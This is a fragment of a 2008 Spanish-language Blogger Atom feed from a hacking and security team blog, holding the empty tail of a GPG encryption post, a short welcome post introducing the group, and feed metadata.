style="font-size:100%;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;/ilun.pr@gmail.com&gt;&lt;/heinrichh@duesseldorf.de&gt;&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-3978819278344942497?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/3978819278344942497/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/cifrado-con-gpg.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/3978819278344942497'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/3978819278344942497'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/cifrado-con-gpg.html' title='Cifrado con GPG'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-4304349397149200530</id><published>2008-12-11T01:08:00.000-08:00</published><updated>2008-12-12T13:44:12.039-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bienvenida'/><title type='text'>Bienvenidos!</title><content type='html'>&lt;div align="center"&gt;&lt;u&gt;&lt;b&gt;&lt;span style="font-size:180%;"&gt;BIENVENIDOS AL BLOG DE HACKING DEL TEAM DE SEGURIDAD PIRATES OF THE  ROUTERS&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img442.imageshack.us/img442/8473/piratesoftheroutersteamsc5.png" width="446" height="278" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;PIRATES OF THE  ROUTERS&lt;/b&gt;&lt;/span&gt; &lt;b&gt;Team &lt;/b&gt;es un grupo dedicado a la investigación de la Seguridad/Contraseguridad informática y el underground.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-4304349397149200530?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/4304349397149200530/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/bienvenidos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/4304349397149200530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/4304349397149200530'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/bienvenidos.html' title='Bienvenidos!'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
